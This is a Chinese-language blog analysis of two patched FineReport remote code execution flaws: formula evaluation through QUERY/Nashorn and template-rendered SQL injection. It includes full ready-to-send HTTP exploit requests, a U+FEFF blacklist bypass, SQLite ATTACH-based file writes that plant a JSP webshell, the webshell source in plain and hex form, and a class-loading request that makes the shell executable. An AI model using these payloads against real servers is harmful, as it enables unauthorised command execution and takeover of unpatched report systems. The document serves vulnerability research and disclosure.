官方漏洞声明:安全漏洞声明- FineReport帮助文档 - 全面的报表使用教程和学习资料

最近出的两个漏洞,官方已修复,问题有些相似,都是通过设计器函数来构造rce。尤其第二个sql注入造成RCE的漏洞还是挺有意思的,记录一下。

evaluate_formula RCE漏洞

漏洞定位fine-report-engine-10.0.jar中的EvaluateFormulaAction类。获取expression参数值

evalValue最终调用到如下方法

FunctionCall对应的是设计器函数,查看官方文档:设计器函数汇总- FineReport帮助文档 - 全面的报表使用教程和学习资料

大部分设计器函数FunctionCall都实现自抽象类AbstractFunction。AbstractFunction有诸多实现类,列表如上面官方文档所示。

evalExpression()最终调用AbstractFunction实现类的run方法。

JVM

网上常见的poc调用的是AbstractFunction实现类JVM。其run方法如下,会泄漏环境信息。

return "Jar build time: " + var2 + "\nHome: " + System.getProperty("java.home") + "\nVersion: " + System.getProperty("java.version") + "\nUser home: " + ProductConstants.getEnvHome() + "\nEnv path : " + FRContext.getCurrentEnv().getPath();
QUERY

在10版本(也许是新一点的10版本)引入了QUERY设计器函数,对应的类代码如下。

方法接收两个参数,第二个参数会执行运算。这里需要注意的是J2V8Utils.SUPPORT_J2V8,如果支持J2V8 ,由com.eclipsesource.v8来执行脚本,如果不支持J2V8由Nashorn来执行脚本。而后者是可以实现RCE的。示例如下。

但是实际测试的时候,发现大多都是进入的com.eclipsesource.v8这个分支,也就是支持J2V8的。

那么什么场景下,才能不支持J2V8从而让Nashorn执行呢?查看官方文档:

​​​​​​图表导出升级说明- FineReport帮助文档 - 全面的报表使用教程和学习资料

文档中提到:若报表部署在 Linux 环境下,且 JDK 版本在 1.8 以下,则需要加载 J2V8 的 libj2v8_linux_x86_64.so,依赖相应版本的 GCC ,如果 GCC 版本过低,则可能存在J2V8 is not supported. Please update GCC。那么此场景下就不支持J2V8,有可能进行Nashorn攻击。

POST /webroot/ReportServer HTTP/1.1
Host: ip:port
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 145

op=fr_base&cmd=evaluate_formula&expression=QUERY("hello","function(){var x=java.lang.Runtime.getRuntime().exec(\"calc.exe\")}")

所以整体来看这个利用方式存在诸多限制,首先这个QUERY方法需要在10版本以上才有,其次限制系统为linux且GCC版本较低。

/view/ReportServer sql注入RCE漏洞

漏洞定位fine-report-engine-11.0.jar中的ReportRequestCompatibleService类

preview方法,会对传入的参数值进行TemplateUtils.render渲染。跟进render。

evalValue方法同样走到Calculator.eval(),和上面的evaluate_formula后续过程基本一致。


只不过此漏洞的构造攻击者选取了SQL函数。跟进SQL的run方法,根据代码可以看出需要传入三到四个参数。

查看报表函数的说明文档,SQL用法如下。通过sql语句从connectionName(数据库)中获得数据表的第columnIndex列第rowIndex行所对应的元素。

SQL(connectionName,sql,columnIndex,rowIndex)

那么想要执行sql需要获取一个已知的connectionName,全局搜索的到“FRDemo”。

官方示例中给的demo:=sql("FRDemo","SELECT * FROM 销量 ",1,1)

这里需要注意,参数是通过getQueryString传入的,而这个方法只对get方法有效,如果用post的Body传参数接收到的是null。

TemplateUtils.render("${fineServletURL}/view/report?" + var1.getQueryString())
DECODE处理特殊字符

尝试在这个路径下GET传入demo中的sql语句。会显示400,因为tomcat会将空格等特殊字符视作无效字符。

但是如果将空格等内容进行url编码。getQueryString()获取的结果如下(该方法并不会对获取到的参数进行url解码)

axisx=${sql('FRDemo','select%201',1)} 

那么进入到sqlite的sql语句是select%201。会报错Error: near line 1: near "%": syntax error。无法执行sql,所以最后无法返回结果。

而这个漏洞很巧妙的一点,就是从上面提到的那些设计器函数中又找到了一个DECODE函数来完成url解码,解决上述问题。

sqlite rce

帆软默认采用的sqlite数据库,sqlite是嵌入式数据库,每个数据库是一个文件。所以一种RCE的方式是,通过sqlite语句创建一个数据库(相当于新建一个文件),然后在这个数据库中创建一个表来写入数据,也就是文件的内容。语句如下。

ATTACH DATABASE '../webapps/webroot/hack.jsp' as hack
CREATE TABLE hack.exp(data text)
INSERT INTO hack.exp(data) VALUES x'6861636b6564'
sql黑名单处理逻辑

尝试在sql中输入上述语句,会发现没有效果。帆软对数据库操作做了一定的限制。

主要两个方法。1. removeSpecialCharacters()。该方法检查sql查询是否为空,不为空将sql内容转成小写,然后将引号(单引号和双引号)和注释(单行注释--和多行注释/*)中的内容替换为空格。如果遇到特殊字符(如下,均为分隔符或空白符)替换为空格。2. check()。该方法用于检查sql查询中是否包含指定的关键词,如果包含就会抛出SQLException异常,相当于黑名单检查。

private static boolean isSpecialCharacter(char c) {
        return c == ',' || c == '\n' || c == ';' || c == '\t' || c == '\r' || c == '\f' || c == 11;
}

/*
, (逗号): 在 SQL 语句中,逗号用作分隔符,如在 SELECT 语句中分隔列。
\n (换行符): 用于分隔行,在 SQL 语句中通常用于分隔不同的语句。
; (分号): SQL 语句的结尾符,用于标识一个语句的结束。
\t (制表符): 用于分隔字段或对齐文本,在 SQL 语句中通常作为空白字符。
\r (回车符): 与换行符一起使用,用于分隔行,特别是在某些操作系统(如 Windows)中。
\f (换页符): 在 SQL 语句中较少使用,但在某些文本处理中可能用于分隔。
11 (垂直制表符): 类似于换页符,在 SQL 语句中较少使用,主要用于文本中的格式化。
*/

而黑名单keywords中包含了attach、create等字段,如下。

根据上面的removeSpecialCharacters()处理逻辑,如果传入的是字符串“ATTACH 'aaa'”,那么替换后为"ATTACH   "。

黑名单匹配的probed逻辑如下。判断处理后的sql字符串中是否包含关键字,而关键字的前后加入了空格。tmp前后的空格数量只要>=1,黑名单就匹配成功。那么想要绕过黑名单检测,就需要让sql前或后没有空格,或者attach前后还有别的字符。

U+FEFF黑名单绕过

这里的绕过方式还是挺巧妙的,用的U+FEFF。

在sqlite文档中查看U+FEFF的内容

https://android.googlesource.com/platform//external/sqlite/+/d11514d85b96ef33b1a78080246df7df2cf5d9ea/dist/orig/sqlite3.h

这段描述的是SQLite在处理 UTF-16 编码的输入文本时如何确定字节顺序。UTF-16 编码的文本可能以一个字节顺序标记(BOM,U+FEFF)开头,表示字节顺序(即大端序或小端序)。如果文本的开头包含 BOM,SQLite 会读取这个 BOM 来确定字节顺序,然后移除 BOM。如果我们在sql语句最开头加入U+FEFF(U+FEFF 的编码是三个字节:EF BB BF。在HTTP请求中转成UTF-8编码形式%EF%BB%BF),那么在probed时,sql获取到的是" %ef%bb%bfattach ",由于attach前有字符和" attach "无法匹配。从而绕过了黑名单。而在真正sqlite进行数据读取时,它又被当作BOM移除掉了,不影响sql解析。

那么为了绕过黑名单,上述sqlite rce的语句都需要加上这个BOM头。如下。然后再将特殊字符进行url编码,并在语句外围加上DECODE设计器函数解码。

%EF%BB%BFATTACH DATABASE '../webapps/webroot/hack.jsp' as hack
%EF%BB%BFCREATE TABLE hack.exp(data text)
%EF%BB%BFINSERT INTO hack.exp(data) VALUES x'6861636b6564'
POC构造

将带回显的一句话木马,如下,转成16进制,作为sql第三步insert的内容。

 <%
    Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
    InputStream inputStream = process.getInputStream();
    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
    String line;
    while ((line = bufferedReader.readLine()) != null){
      response.getWriter().println(line);
    }
 %>


构造的poc如下

GET /webroot/decision/view/ReportServer?test=${sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Faxisx.jsp%27%20as%20hack%3B'),1,1)}${sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20hack.exp%28data%20text%29%3B'),1,1)}${sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20hack.exp%28data%29%20VALUES%20%28x%27203c25a2020202050726f636573732070726f63657373203d2052756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d657465722822636d642229293ba20202020496e70757453747265616d20696e70757453747265616d203d2070726f636573732e676574496e70757453747265616d28293ba202020204275666665726564526561646572206275666665726564526561646572203d206e6577204275666665726564526561646572286e657720496e70757453747265616d52656164657228696e70757453747265616d29293ba20202020537472696e67206c696e653ba202020207768696c652028286c696e65203d2062756666657265645265616465722e726561644c696e6528292920213d206e756c6c297ba202020202020726573706f6e73652e67657457726974657228292e7072696e746c6e286c696e65293ba202020207da20253e%27%29%3B'),1,1)} HTTP/1.1
Host: 172.16.165.142:8075
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

webroot下成功生成axisx.jsp

尝试访问axisx.jsp,报错500,问题出在jasper上。

解决jsp编译报错

jasper

Jasper是tomcat中使用的JSP引擎,将jsp文件编译成JVM可识别的class文件。Tomcat在默认的web.xml中配置org.apache.jasper.servlet.JspServlet,用于处理.jsp和.jspx后缀的请求。在帆软中查找web.xml的内容,定位C:\FineReport_11.0\server\conf\web.xml。最终jsp会被当成一个servlet来执行。

根据上面jsp访问的报错信息搜索相关文章,在关于编译和运行Tomcat源码的文章中提到。通过Tomcat的启动入口—org.apache.catalina.startup.Bootstrap类访问localhost:8080时出现了类似的报错,原因是JSP解析器没有初始化。也就是JasperInitializer没有执行过。

解决jasper初始化

根据报错java.lang.NullPointerException定位问题点org.apache.jasper.compiler.Validator$ValidateVisitor.<init>。调试时发现JspFactory.getDefaultFactory()是null。所以null再调用后面的方法时就会报错。

看一下JasperInitializer的初始化(static代码块),在这个过程中会判断JspFactory.getDefaultFactory(),如果是null的话,会对其进行赋值。因为帆软启动方式没有进行JasperInitializer初始化,所以造成了上面空指针的问题。

那么问题就变成了如何能够执行JasperInitializer的初始化。Class.forName类加载时会执行static代码块。那么如果能够执行Class.forName("org.apache.jasper.servlet.JasperInitializer"),就可以完成初始化。

然后就有师傅找到了前台接口FileRequestService。其中的getFile方法接收path和type参数。代码中包含明显的classForName。type类型有两种plain和class。type的值为class时进入else。

对path传入的参数值执行Class.forName()。那么想要初始化JasperInitializer,构造poc如下

GET /webroot/decision/file?path=org.apache.jasper.servlet.JasperInitializer&type=class HTTP/1.1

执行一次该poc,可以成功访问jsp。

木马写入问题

Ps:调试问题时,将断点打在catalina.jar中的ApplicationFilterChain的doFilter方法的如下代码中

catch (ServletException | RuntimeException | IOException var15) { throw var15;}

真正尝试写木马的时候会遇见一些问题,比如我们将如下的木马内容直接转成16进制。然后通过漏洞传入。

<%
    Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
    InputStream inputStream = process.getInputStream();
    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
    String line;
    while ((line = bufferedReader.readLine()) != null){
      response.getWriter().println(line);
    }
%>

访问jsp会发现抛出异常Syntax error on token "&", invalid AssignmentOperator。查看jsp文件,发现生成了很多脏字符,jsp内容如下

感觉像是换行符带来的脏字符,将jsp中所有的换行符删掉。再次发送payload,这次不再显示Syntax error on token,而是报错InputStream cannot be resolved to a type。

也就是说InputStream 类没有被识别,通常是因为没有导入对应的类。

更改一句话木马,引入需要的库,生成的jsp如下。

<%@ page import="java.io.InputStream, java.io.InputStreamReader, java.io.BufferedReader" %>
<%
    Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
    InputStream inputStream = process.getInputStream();
    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
    String line;
    while ((line = bufferedReader.readLine()) != null){
      response.getWriter().println(line);
    }
%>

删除所有的换行后,生成16进制串,如下。

3c2540207061676520696d706f72743d226a6176612e696f2e496e70757453747265616d2c206a6176612e696f2e496e70757453747265616d5265616465722c206a6176612e696f2e42756666657265645265616465722220253e3c2550726f636573732070726f63657373203d2052756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d657465722822636d642229293b496e70757453747265616d20696e70757453747265616d203d2070726f636573732e676574496e70757453747265616d28293b4275666665726564526561646572206275666665726564526561646572203d206e6577204275666665726564526561646572286e657720496e70757453747265616d52656164657228696e70757453747265616d29293b537472696e67206c696e653b7768696c652028286c696e65203d2062756666657265645265616465722e726561644c696e6528292920213d206e756c6c297b726573706f6e73652e67657457726974657228292e7072696e746c6e286c696e65293b7d253e

再次发送payload,成功访问一句话木马

所以在漏洞利用时需要注意,木马不能包含换行,且需要引入用到的类。

另外,网上还有一些payload如下。

GET /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Faaa.jsp%27%20as%20gggggg%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20gggggg.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20gggggg.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B'),1,1)} HTTP/1.1
Host: ip
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

特点是1. 在模板前加入参数,如n=${sql}  2. 模板中加入${__fr_locale__=sql()}。1的话有没有参数不影响。2的话模板中加入什么作为key都可以,例如${kkk=sql()}。

漏洞修复

修复前,如下

修复后,不再对传入的参数进行模版渲染。

Logo

开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!

更多推荐